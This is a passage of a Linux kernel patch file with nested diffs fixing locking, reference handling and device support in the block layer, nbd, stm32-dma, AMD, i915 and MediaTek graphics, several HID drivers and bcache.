++	for (i = 0; i < BLKCG_MAX_POLS; i++) {
++		struct blkcg_policy *pol = blkcg_policy[i];
++
++		if (pol)
++			__clear_bit(pol->plid, q->blkcg_pols);
++	}
++
+ 	q->root_blkg = NULL;
+ 	spin_unlock_irq(&q->queue_lock);
+ }
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index 009b0d76bf036..62a3f62316df1 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -1333,6 +1333,7 @@ static void tg_conf_updated(struct throtl_grp *tg, bool global)
+ 		   tg_bps_limit(tg, READ), tg_bps_limit(tg, WRITE),
+ 		   tg_iops_limit(tg, READ), tg_iops_limit(tg, WRITE));
+ 
++	rcu_read_lock();
+ 	/*
+ 	 * Update has_rules[] flags for the updated tg's subtree.  A tg is
+ 	 * considered to have rules if either the tg itself or any of its
+@@ -1360,6 +1361,7 @@ static void tg_conf_updated(struct throtl_grp *tg, bool global)
+ 		this_tg->latency_target = max(this_tg->latency_target,
+ 				parent_tg->latency_target);
+ 	}
++	rcu_read_unlock();
+ 
+ 	/*
+ 	 * We're already holding queue_lock and know @tg is valid.  Let's
+diff --git a/drivers/atm/solos-pci.c b/drivers/atm/solos-pci.c
+index 94fbc3abe60e6..d3c30a28c410e 100644
+--- a/drivers/atm/solos-pci.c
++++ b/drivers/atm/solos-pci.c
+@@ -449,9 +449,9 @@ static ssize_t console_show(struct device *dev, struct device_attribute *attr,
+ 	struct sk_buff *skb;
+ 	unsigned int len;
+ 
+-	spin_lock(&card->cli_queue_lock);
++	spin_lock_bh(&card->cli_queue_lock);
+ 	skb = skb_dequeue(&card->cli_queue[SOLOS_CHAN(atmdev)]);
+-	spin_unlock(&card->cli_queue_lock);
++	spin_unlock_bh(&card->cli_queue_lock);
+ 	if(skb == NULL)
+ 		return sprintf(buf, "No data.\n");
+ 
+@@ -956,14 +956,14 @@ static void pclose(struct atm_vcc *vcc)
+ 	struct pkt_hdr *header;
+ 
+ 	/* Remove any yet-to-be-transmitted packets from the pending queue */
+-	spin_lock(&card->tx_queue_lock);
++	spin_lock_bh(&card->tx_queue_lock);
+ 	skb_queue_walk_safe(&card->tx_queue[port], skb, tmpskb) {
+ 		if (SKB_CB(skb)->vcc == vcc) {
+ 			skb_unlink(skb, &card->tx_queue[port]);
+ 			solos_pop(vcc, skb);
+ 		}
+ 	}
+-	spin_unlock(&card->tx_queue_lock);
++	spin_unlock_bh(&card->tx_queue_lock);
+ 
+ 	skb = alloc_skb(sizeof(*header), GFP_KERNEL);
+ 	if (!skb) {
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index e94d2ff6b1223..8037aaefeb2ed 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -67,6 +67,7 @@ struct nbd_sock {
+ struct recv_thread_args {
+ 	struct work_struct work;
+ 	struct nbd_device *nbd;
++	struct nbd_sock *nsock;
+ 	int index;
+ };
+ 
+@@ -489,15 +490,9 @@ done:
+ 	return BLK_EH_DONE;
+ }
+ 
+-/*
+- *  Send or receive packet. Return a positive value on success and
+- *  negtive value on failue, and never return 0.
+- */
+-static int sock_xmit(struct nbd_device *nbd, int index, int send,
+-		     struct iov_iter *iter, int msg_flags, int *sent)
++static int __sock_xmit(struct nbd_device *nbd, struct socket *sock, int send,
++		       struct iov_iter *iter, int msg_flags, int *sent)
+ {
+-	struct nbd_config *config = nbd->config;
+-	struct socket *sock = config->socks[index]->sock;
+ 	int result;
+ 	struct msghdr msg;
+ 	unsigned int noreclaim_flag;
+@@ -539,6 +534,19 @@ static int sock_xmit(struct nbd_device *nbd, int index, int send,
+ 	return result;
+ }
+ 
++/*
++ *  Send or receive packet. Return a positive value on success and
++ *  negtive value on failure, and never return 0.
++ */
++static int sock_xmit(struct nbd_device *nbd, int index, int send,
++		     struct iov_iter *iter, int msg_flags, int *sent)
++{
++	struct nbd_config *config = nbd->config;
++	struct socket *sock = config->socks[index]->sock;
++
++	return __sock_xmit(nbd, sock, send, iter, msg_flags, sent);
++}
++
+ /*
+  * Different settings for sk->sk_sndtimeo can result in different return values
+  * if there is a signal pending when we enter sendmsg, because reasons?
+@@ -695,7 +703,7 @@ out:
+ 	return 0;
+ }
+ 
+-static int nbd_read_reply(struct nbd_device *nbd, int index,
++static int nbd_read_reply(struct nbd_device *nbd, struct socket *sock,
+ 			  struct nbd_reply *reply)
+ {
+ 	struct kvec iov = {.iov_base = reply, .iov_len = sizeof(*reply)};
+@@ -704,7 +712,7 @@ static int nbd_read_reply(struct nbd_device *nbd, int index,
+ 
+ 	reply->magic = 0;
+ 	iov_iter_kvec(&to, ITER_DEST, &iov, 1, sizeof(*reply));
+-	result = sock_xmit(nbd, index, 0, &to, MSG_WAITALL, NULL);
++	result = __sock_xmit(nbd, sock, 0, &to, MSG_WAITALL, NULL);
+ 	if (result < 0) {
+ 		if (!nbd_disconnected(nbd->config))
+ 			dev_err(disk_to_dev(nbd->disk),
+@@ -828,14 +836,14 @@ static void recv_work(struct work_struct *work)
+ 	struct nbd_device *nbd = args->nbd;
+ 	struct nbd_config *config = nbd->config;
+ 	struct request_queue *q = nbd->disk->queue;
+-	struct nbd_sock *nsock;
++	struct nbd_sock *nsock = args->nsock;
+ 	struct nbd_cmd *cmd;
+ 	struct request *rq;
+ 
+ 	while (1) {
+ 		struct nbd_reply reply;
+ 
+-		if (nbd_read_reply(nbd, args->index, &reply))
++		if (nbd_read_reply(nbd, nsock->sock, &reply))
+ 			break;
+ 
+ 		/*
+@@ -870,7 +878,6 @@ static void recv_work(struct work_struct *work)
+ 		percpu_ref_put(&q->q_usage_counter);
+ 	}
+ 
+-	nsock = config->socks[args->index];
+ 	mutex_lock(&nsock->tx_lock);
+ 	nbd_mark_nsock_dead(nbd, nsock, 1);
+ 	mutex_unlock(&nsock->tx_lock);
+@@ -1214,6 +1221,7 @@ static int nbd_reconnect_socket(struct nbd_device *nbd, unsigned long arg)
+ 		INIT_WORK(&args->work, recv_work);
+ 		args->index = i;
+ 		args->nbd = nbd;
++		args->nsock = nsock;
+ 		nsock->cookie++;
+ 		mutex_unlock(&nsock->tx_lock);
+ 		sockfd_put(old);
+@@ -1396,6 +1404,7 @@ static int nbd_start_device(struct nbd_device *nbd)
+ 		refcount_inc(&nbd->config_refs);
+ 		INIT_WORK(&args->work, recv_work);
+ 		args->nbd = nbd;
++		args->nsock = config->socks[i];
+ 		args->index = i;
+ 		queue_work(nbd->recv_workq, &args->work);
+ 	}
+@@ -1530,17 +1539,20 @@ static int nbd_ioctl(struct block_device *bdev, fmode_t mode,
+ 	return error;
+ }
+ 
+-static struct nbd_config *nbd_alloc_config(void)
++static int nbd_alloc_and_init_config(struct nbd_device *nbd)
+ {
+ 	struct nbd_config *config;
+ 
++	if (WARN_ON(nbd->config))
++		return -EINVAL;
++
+ 	if (!try_module_get(THIS_MODULE))
+-		return ERR_PTR(-ENODEV);
++		return -ENODEV;
+ 
+ 	config = kzalloc(sizeof(struct nbd_config), GFP_NOFS);
+ 	if (!config) {
+ 		module_put(THIS_MODULE);
+-		return ERR_PTR(-ENOMEM);
++		return -ENOMEM;
+ 	}
+ 
+ 	atomic_set(&config->recv_threads, 0);
+@@ -1548,7 +1560,10 @@ static struct nbd_config *nbd_alloc_config(void)
+ 	init_waitqueue_head(&config->conn_wait);
+ 	config->blksize_bits = NBD_DEF_BLKSIZE_BITS;
+ 	atomic_set(&config->live_connections, 0);
+-	return config;
++	nbd->config = config;
++	refcount_set(&nbd->config_refs, 1);
++
++	return 0;
+ }
+ 
+ static int nbd_open(struct block_device *bdev, fmode_t mode)
+@@ -1567,21 +1582,17 @@ static int nbd_open(struct block_device *bdev, fmode_t mode)
+ 		goto out;
+ 	}
+ 	if (!refcount_inc_not_zero(&nbd->config_refs)) {
+-		struct nbd_config *config;
+-
+ 		mutex_lock(&nbd->config_lock);
+ 		if (refcount_inc_not_zero(&nbd->config_refs)) {
+ 			mutex_unlock(&nbd->config_lock);
+ 			goto out;
+ 		}
+-		config = nbd_alloc_config();
+-		if (IS_ERR(config)) {
+-			ret = PTR_ERR(config);
++		ret = nbd_alloc_and_init_config(nbd);
++		if (ret) {
+ 			mutex_unlock(&nbd->config_lock);
+ 			goto out;
+ 		}
+-		nbd->config = config;
+-		refcount_set(&nbd->config_refs, 1);
++
+ 		refcount_inc(&nbd->refs);
+ 		mutex_unlock(&nbd->config_lock);
+ 		if (max_part)
+@@ -1990,22 +2001,17 @@ again:
+ 		pr_err("nbd%d already in use\n", index);
+ 		return -EBUSY;
+ 	}
+-	if (WARN_ON(nbd->config)) {
+-		mutex_unlock(&nbd->config_lock);
+-		nbd_put(nbd);
+-		return -EINVAL;
+-	}
+-	config = nbd_alloc_config();
+-	if (IS_ERR(config)) {
++
++	ret = nbd_alloc_and_init_config(nbd);
++	if (ret) {
+ 		mutex_unlock(&nbd->config_lock);
+ 		nbd_put(nbd);
+ 		pr_err("couldn't allocate config\n");
+-		return PTR_ERR(config);
++		return ret;
+ 	}
+-	nbd->config = config;
+-	refcount_set(&nbd->config_refs, 1);
+-	set_bit(NBD_RT_BOUND, &config->runtime_flags);
+ 
++	config = nbd->config;
++	set_bit(NBD_RT_BOUND, &config->runtime_flags);
+ 	ret = nbd_genl_size_set(info, nbd);
+ 	if (ret)
+ 		goto out;
+diff --git a/drivers/dma/stm32-dma.c b/drivers/dma/stm32-dma.c
+index 592d48ecf241f..7abcd7f2848ee 100644
+--- a/drivers/dma/stm32-dma.c
++++ b/drivers/dma/stm32-dma.c
+@@ -1249,8 +1249,8 @@ static struct dma_async_tx_descriptor *stm32_dma_prep_dma_memcpy(
+ 	enum dma_slave_buswidth max_width;
+ 	struct stm32_dma_desc *desc;
+ 	size_t xfer_count, offset;
+-	u32 num_sgs, best_burst, dma_burst, threshold;
+-	int i;
++	u32 num_sgs, best_burst, threshold;
++	int dma_burst, i;
+ 
+ 	num_sgs = DIV_ROUND_UP(len, STM32_DMA_ALIGNED_MAX_DATA_ITEMS);
+ 	desc = kzalloc(struct_size(desc, sg_req, num_sgs), GFP_NOWAIT);
+@@ -1268,6 +1268,10 @@ static struct dma_async_tx_descriptor *stm32_dma_prep_dma_memcpy(
+ 		best_burst = stm32_dma_get_best_burst(len, STM32_DMA_MAX_BURST,
+ 						      threshold, max_width);
+ 		dma_burst = stm32_dma_get_burst(chan, best_burst);
++		if (dma_burst < 0) {
++			kfree(desc);
++			return NULL;
++		}
+ 
+ 		stm32_dma_clear_reg(&desc->sg_req[i].chan_reg);
+ 		desc->sg_req[i].chan_reg.dma_scr =
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index 4642cff0e1a4f..69b3829bbe53f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -631,13 +631,14 @@ static void amdgpu_vm_pt_free(struct amdgpu_vm_bo_base *entry)
+ 
+ 	if (!entry->bo)
+ 		return;
++
++	entry->bo->vm_bo = NULL;
+ 	shadow = amdgpu_bo_shadowed(entry->bo);
+ 	if (shadow) {
+ 		ttm_bo_set_bulk_move(&shadow->tbo, NULL);
+ 		amdgpu_bo_unref(&shadow);
+ 	}
+ 	ttm_bo_set_bulk_move(&entry->bo->tbo, NULL);
+-	entry->bo->vm_bo = NULL;
+ 
+ 	spin_lock(&entry->vm->status_lock);
+ 	list_del(&entry->vm_status);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+index 809eca54fc617..856db876af141 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+@@ -1690,6 +1690,32 @@ static void sdma_v5_2_get_clockgating_state(void *handle, u64 *flags)
+ 		*flags |= AMD_CG_SUPPORT_SDMA_LS;
+ }
+ 
++static void sdma_v5_2_ring_begin_use(struct amdgpu_ring *ring)
++{
++	struct amdgpu_device *adev = ring->adev;
++
++	/* SDMA 5.2.3 (RMB) FW doesn't seem to properly
++	 * disallow GFXOFF in some cases leading to
++	 * hangs in SDMA.  Disallow GFXOFF while SDMA is active.
++	 * We can probably just limit this to 5.2.3,
++	 * but it shouldn't hurt for other parts since
++	 * this GFXOFF will be disallowed anyway when SDMA is
++	 * active, this just makes it explicit.
++	 */
++	amdgpu_gfx_off_ctrl(adev, false);
++}
++
++static void sdma_v5_2_ring_end_use(struct amdgpu_ring *ring)
++{
++	struct amdgpu_device *adev = ring->adev;
++
++	/* SDMA 5.2.3 (RMB) FW doesn't seem to properly
++	 * disallow GFXOFF in some cases leading to
++	 * hangs in SDMA.  Allow GFXOFF when SDMA is complete.
++	 */
++	amdgpu_gfx_off_ctrl(adev, true);
++}
++
+ const struct amd_ip_funcs sdma_v5_2_ip_funcs = {
+ 	.name = "sdma_v5_2",
+ 	.early_init = sdma_v5_2_early_init,
+@@ -1738,6 +1764,8 @@ static const struct amdgpu_ring_funcs sdma_v5_2_ring_funcs = {
+ 	.test_ib = sdma_v5_2_ring_test_ib,
+ 	.insert_nop = sdma_v5_2_ring_insert_nop,
+ 	.pad_ib = sdma_v5_2_ring_pad_ib,
++	.begin_use = sdma_v5_2_ring_begin_use,
++	.end_use = sdma_v5_2_ring_end_use,
+ 	.emit_wreg = sdma_v5_2_ring_emit_wreg,
+ 	.emit_reg_wait = sdma_v5_2_ring_emit_reg_wait,
+ 	.emit_reg_write_reg_wait = sdma_v5_2_ring_emit_reg_write_reg_wait,
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 9edd39322c822..67287ad07226c 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -816,6 +816,8 @@ bool is_psr_su_specific_panel(struct dc_link *link)
+ 				((dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x08) ||
+ 				(dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x07)))
+ 				isPSRSUSupported = false;
++			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
++				isPSRSUSupported = false;
+ 			else if (dpcd_caps->psr_info.force_psrsu_cap == 0x1)
+ 				isPSRSUSupported = true;
+ 		}
+diff --git a/drivers/gpu/drm/i915/display/intel_fb.c b/drivers/gpu/drm/i915/display/intel_fb.c
+index eefa33c555aca..23d854bd73b77 100644
+--- a/drivers/gpu/drm/i915/display/intel_fb.c
++++ b/drivers/gpu/drm/i915/display/intel_fb.c
+@@ -1441,8 +1441,20 @@ static u32 calc_plane_remap_info(const struct intel_framebuffer *fb, int color_p
+ 
+ 			size += remap_info->size;
+ 		} else {
+-			unsigned int dst_stride = plane_view_dst_stride_tiles(fb, color_plane,
+-									      remap_info->width);
++			unsigned int dst_stride;
++
++			/*
++			 * The hardware automagically calculates the CCS AUX surface
++			 * stride from the main surface stride so can't really remap a
++			 * smaller subset (unless we'd remap in whole AUX page units).
++			 */
++			if (intel_fb_needs_pot_stride_remap(fb) &&
++			    intel_fb_is_ccs_modifier(fb->base.modifier))
++				dst_stride = remap_info->src_stride;
++			else
++				dst_stride = remap_info->width;
++
++			dst_stride = plane_view_dst_stride_tiles(fb, color_plane, dst_stride);
+ 
+ 			assign_chk_ovf(i915, remap_info->dst_stride, dst_stride);
+ 			color_plane_info->mapping_stride = dst_stride *
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 7fb52a573436e..558000db4a100 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -736,6 +736,7 @@ static void mtk_drm_crtc_atomic_begin(struct drm_crtc *crtc,
+ 									  crtc);
+ 	struct mtk_crtc_state *mtk_crtc_state = to_mtk_crtc_state(crtc_state);
+ 	struct mtk_drm_crtc *mtk_crtc = to_mtk_crtc(crtc);
++	unsigned long flags;
+ 
+ 	if (mtk_crtc->event && mtk_crtc_state->base.event)
+ 		DRM_ERROR("new event while there is still a pending event\n");
+@@ -743,7 +744,11 @@ static void mtk_drm_crtc_atomic_begin(struct drm_crtc *crtc,
+ 	if (mtk_crtc_state->base.event) {
+ 		mtk_crtc_state->base.event->pipe = drm_crtc_index(crtc);
+ 		WARN_ON(drm_crtc_vblank_get(crtc) != 0);
++
++		spin_lock_irqsave(&crtc->dev->event_lock, flags);
+ 		mtk_crtc->event = mtk_crtc_state->base.event;
++		spin_unlock_irqrestore(&crtc->dev->event_lock, flags);
++
+ 		mtk_crtc_state->base.event = NULL;
+ 	}
+ }
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index d1094bb1aa429..220d6b2af4d3f 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -380,7 +380,7 @@ static int asus_raw_event(struct hid_device *hdev,
+ 	return 0;
+ }
+ 
+-static int asus_kbd_set_report(struct hid_device *hdev, u8 *buf, size_t buf_size)
++static int asus_kbd_set_report(struct hid_device *hdev, const u8 *buf, size_t buf_size)
+ {
+ 	unsigned char *dmabuf;
+ 	int ret;
+@@ -403,7 +403,7 @@ static int asus_kbd_set_report(struct hid_device *hdev, u8 *buf, size_t buf_size
+ 
+ static int asus_kbd_init(struct hid_device *hdev)
+ {
+-	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x41, 0x53, 0x55, 0x53, 0x20, 0x54,
++	const u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x41, 0x53, 0x55, 0x53, 0x20, 0x54,
+ 		     0x65, 0x63, 0x68, 0x2e, 0x49, 0x6e, 0x63, 0x2e, 0x00 };
+ 	int ret;
+ 
+@@ -417,7 +417,7 @@ static int asus_kbd_init(struct hid_device *hdev)
+ static int asus_kbd_get_functions(struct hid_device *hdev,
+ 				  unsigned char *kbd_func)
+ {
+-	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x05, 0x20, 0x31, 0x00, 0x08 };
++	const u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x05, 0x20, 0x31, 0x00, 0x08 };
+ 	u8 *readbuf;
+ 	int ret;
+ 
+@@ -448,7 +448,7 @@ static int asus_kbd_get_functions(struct hid_device *hdev,
+ 
+ static int rog_nkey_led_init(struct hid_device *hdev)
+ {
+-	u8 buf_init_start[] = { FEATURE_KBD_LED_REPORT_ID1, 0xB9 };
++	const u8 buf_init_start[] = { FEATURE_KBD_LED_REPORT_ID1, 0xB9 };
+ 	u8 buf_init2[] = { FEATURE_KBD_LED_REPORT_ID1, 0x41, 0x53, 0x55, 0x53, 0x20,
+ 				0x54, 0x65, 0x63, 0x68, 0x2e, 0x49, 0x6e, 0x63, 0x2e, 0x00 };
+ 	u8 buf_init3[] = { FEATURE_KBD_LED_REPORT_ID1,
+@@ -1012,6 +1012,24 @@ static int asus_start_multitouch(struct hid_device *hdev)
+ 	return 0;
+ }
+ 
++static int __maybe_unused asus_resume(struct hid_device *hdev) {
++	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
++	int ret = 0;
++
++	if (drvdata->kbd_backlight) {
++		const u8 buf[] = { FEATURE_KBD_REPORT_ID, 0xba, 0xc5, 0xc4,
++				drvdata->kbd_backlight->cdev.brightness };
++		ret = asus_kbd_set_report(hdev, buf, sizeof(buf));
++		if (ret < 0) {
++			hid_err(hdev, "Asus failed to set keyboard backlight: %d\n", ret);
++			goto asus_resume_err;
++		}
++	}
++
++asus_resume_err:
++	return ret;
++}
++
+ static int __maybe_unused asus_reset_resume(struct hid_device *hdev)
+ {
+ 	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
+@@ -1303,6 +1321,7 @@ static struct hid_driver asus_driver = {
+ 	.input_configured       = asus_input_configured,
+ #ifdef CONFIG_PM
+ 	.reset_resume           = asus_reset_resume,
++	.resume					= asus_resume,
+ #endif
+ 	.event			= asus_event,
+ 	.raw_event		= asus_raw_event
+diff --git a/drivers/hid/hid-glorious.c b/drivers/hid/hid-glorious.c
+index 558eb08c19ef9..281b3a7187cec 100644
+--- a/drivers/hid/hid-glorious.c
++++ b/drivers/hid/hid-glorious.c
+@@ -21,6 +21,10 @@ MODULE_DESCRIPTION("HID driver for Glorious PC Gaming Race mice");
+  * Glorious Model O and O- specify the const flag in the consumer input
+  * report descriptor, which leads to inputs being ignored. Fix this
+  * by patching the descriptor.
++ *
++ * Glorious Model I incorrectly specifes the Usage Minimum for its
++ * keyboard HID report, causing keycodes to be misinterpreted.
++ * Fix this by setting Usage Minimum to 0 in that report.
+  */
+ static __u8 *glorious_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		unsigned int *rsize)
+@@ -32,6 +36,10 @@ static __u8 *glorious_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		rdesc[85] = rdesc[113] = rdesc[141] = \
+ 			HID_MAIN_ITEM_VARIABLE | HID_MAIN_ITEM_RELATIVE;
+ 	}
++	if (*rsize == 156 && rdesc[41] == 1) {
++		hid_info(hdev, "patching Glorious Model I keyboard report descriptor\n");
++		rdesc[41] = 0;
++	}
+ 	return rdesc;
+ }
+ 
+@@ -44,6 +52,8 @@ static void glorious_update_name(struct hid_device *hdev)
+ 		model = "Model O"; break;
+ 	case USB_DEVICE_ID_GLORIOUS_MODEL_D:
+ 		model = "Model D"; break;
++	case USB_DEVICE_ID_GLORIOUS_MODEL_I:
++		model = "Model I"; break;
+ 	}
+ 
+ 	snprintf(hdev->name, sizeof(hdev->name), "%s %s", "Glorious", model);
+@@ -66,10 +76,12 @@ static int glorious_probe(struct hid_device *hdev,
+ }
+ 
+ static const struct hid_device_id glorious_devices[] = {
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_GLORIOUS,
++	{ HID_USB_DEVICE(USB_VENDOR_ID_SINOWEALTH,
+ 		USB_DEVICE_ID_GLORIOUS_MODEL_O) },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_GLORIOUS,
++	{ HID_USB_DEVICE(USB_VENDOR_ID_SINOWEALTH,
+ 		USB_DEVICE_ID_GLORIOUS_MODEL_D) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_LAVIEW,
++		USB_DEVICE_ID_GLORIOUS_MODEL_I) },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(hid, glorious_devices);
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 130fc5f341422..1be454bafcb91 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -503,10 +503,6 @@
+ #define USB_DEVICE_ID_GENERAL_TOUCH_WIN8_PIT_010A 0x010a
+ #define USB_DEVICE_ID_GENERAL_TOUCH_WIN8_PIT_E100 0xe100
+ 
+-#define USB_VENDOR_ID_GLORIOUS  0x258a
+-#define USB_DEVICE_ID_GLORIOUS_MODEL_D 0x0033
+-#define USB_DEVICE_ID_GLORIOUS_MODEL_O 0x0036
+-
+ #define I2C_VENDOR_ID_GOODIX		0x27c6
+ #define I2C_DEVICE_ID_GOODIX_01F0	0x01f0
+ 
+@@ -729,6 +725,9 @@
+ #define USB_VENDOR_ID_LABTEC		0x1020
+ #define USB_DEVICE_ID_LABTEC_WIRELESS_KEYBOARD	0x0006
+ 
++#define USB_VENDOR_ID_LAVIEW		0x22D4
++#define USB_DEVICE_ID_GLORIOUS_MODEL_I	0x1503
++
+ #define USB_VENDOR_ID_LCPOWER		0x1241
+ #define USB_DEVICE_ID_LCPOWER_LC1000	0xf767
+ 
+@@ -1131,6 +1130,10 @@
+ #define USB_VENDOR_ID_SIGMATEL		0x066F
+ #define USB_DEVICE_ID_SIGMATEL_STMP3780	0x3780
+ 
++#define USB_VENDOR_ID_SINOWEALTH  0x258a
++#define USB_DEVICE_ID_GLORIOUS_MODEL_D 0x0033
++#define USB_DEVICE_ID_GLORIOUS_MODEL_O 0x0036
++
+ #define USB_VENDOR_ID_SIS_TOUCH		0x0457
+ #define USB_DEVICE_ID_SIS9200_TOUCH	0x9200
+ #define USB_DEVICE_ID_SIS817_TOUCH	0x0817
+diff --git a/drivers/hid/hid-lenovo.c b/drivers/hid/hid-lenovo.c
+index 7c1b33be9d134..149a3c74346b4 100644
+--- a/drivers/hid/hid-lenovo.c
++++ b/drivers/hid/hid-lenovo.c
+@@ -692,7 +692,8 @@ static int lenovo_event_cptkbd(struct hid_device *hdev,
+ 		 * so set middlebutton_state to 3
+ 		 * to never apply workaround anymore
+ 		 */
+-		if (cptkbd_data->middlebutton_state == 1 &&
++		if (hdev->product == USB_DEVICE_ID_LENOVO_CUSBKBD &&
++				cptkbd_data->middlebutton_state == 1 &&
+ 				usage->type == EV_REL &&
+ 				(usage->code == REL_X || usage->code == REL_Y)) {
+ 			cptkbd_data->middlebutton_state = 3;
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 8db4ae05febc8..5ec1f174127a3 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2048,6 +2048,11 @@ static const struct hid_device_id mt_devices[] = {
+ 		MT_USB_DEVICE(USB_VENDOR_ID_HANVON_ALT,
+ 			USB_DEVICE_ID_HANVON_ALT_MULTITOUCH) },
+ 
++	/* HONOR GLO-GXXX panel */
++	{ .driver_data = MT_CLS_VTL,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			0x347d, 0x7853) },
++
+ 	/* Ilitek dual touch panel */
+ 	{  .driver_data = MT_CLS_NSMU,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_ILITEK,
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 056bb32091285..60884066362a1 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -33,6 +33,7 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_AKAI, USB_DEVICE_ID_AKAI_MPKMINI2), HID_QUIRK_NO_INIT_REPORTS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ALPS, USB_DEVICE_ID_IBM_GAMEPAD), HID_QUIRK_BADPAD },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_AMI, USB_DEVICE_ID_AMI_VIRT_KEYBOARD_AND_MOUSE), HID_QUIRK_ALWAYS_POLL },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_REVB_ANSI), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ATEN, USB_DEVICE_ID_ATEN_2PORTKVM), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ATEN, USB_DEVICE_ID_ATEN_4PORTKVMC), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ATEN, USB_DEVICE_ID_ATEN_4PORTKVM), HID_QUIRK_NOGET },
+diff --git a/drivers/md/bcache/bcache.h b/drivers/md/bcache/bcache.h
+index aebb7ef10e631..e86fa736dc4ee 100644
+--- a/drivers/md/bcache/bcache.h
++++ b/drivers/md/bcache/bcache.h
+@@ -265,6 +265,7 @@ struct bcache_device {
+ #define BCACHE_DEV_WB_RUNNING		3
+ #define BCACHE_DEV_RATE_DW_RUNNING	4
+ 	int			nr_stripes;
++#define BCH_MIN_STRIPE_SZ		((4 << 20) >> SECTOR_SHIFT)
+ 	unsigned int		stripe_size;
+ 	atomic_t		*stripe_sectors_dirty;
+ 	unsigned long		*full_dirty_stripes;
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 05e3157fc7b4e..6a2f57ae0f3c2 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -974,6 +974,9 @@ err:
+  *
+  * The btree node will have either a read or a write lock held, depending on
+  * level and op->lock.
++ *
++ * Note: Only error code or btree pointer will be returned, it is unncessary
++ *       for callers to check NULL pointer.
+  */
+ struct btree *bch_btree_node_get(struct cache_set *c, struct btree_op *op,
+ 				 struct bkey *k, int level, bool write,
+@@ -1085,6 +1088,10 @@ retry:
+ 	mutex_unlock(&b->c->bucket_lock);
+ }
+ 
++/*
++ * Only error code or btree pointer will be returned, it is unncessary for
++ * callers to check NULL pointer.
++ */
+ struct btree *__bch_btree_node_alloc(struct cache_set *c, struct btree_op *op,
+ 				     int level, bool wait,
+ 				     struct btree *parent)
+diff --git a/drivers/md/bcache/super.c b/drivers/md/bcache/super.c
+index 7660962e7b8b4..70e5bd8961d2f 100644
+--- a/drivers/md/bcache/super.c
++++ b/drivers/md/bcache/super.c
+@@ -905,6 +905,8 @@ static int bcache_device_init(struct bcache_device *d, unsigned int block_size,
+ 
+ 	if (!d->stripe_size)
+ 		d->stripe_size = 1 << 31;
++	else if (d->stripe_size < BCH_MIN_STRIPE_SZ)
++		d->stripe_size = roundup(BCH_MIN_STRIPE_SZ, d->stripe_size);
+ 
+ 	n = DIV_ROUND_UP_ULL(sectors, d->stripe_size);
+ 	if (!n || n > max_stripes) {
+@@ -2017,7 +2019,7 @@ static int run_cache_set(struct cache_set *c)
+ 		c->root = bch_btree_node_get(c, NULL, k,
+ 					     j->btree_level,
+ 					     true, NULL);
+-		if (IS_ERR_OR_NULL(c->root))
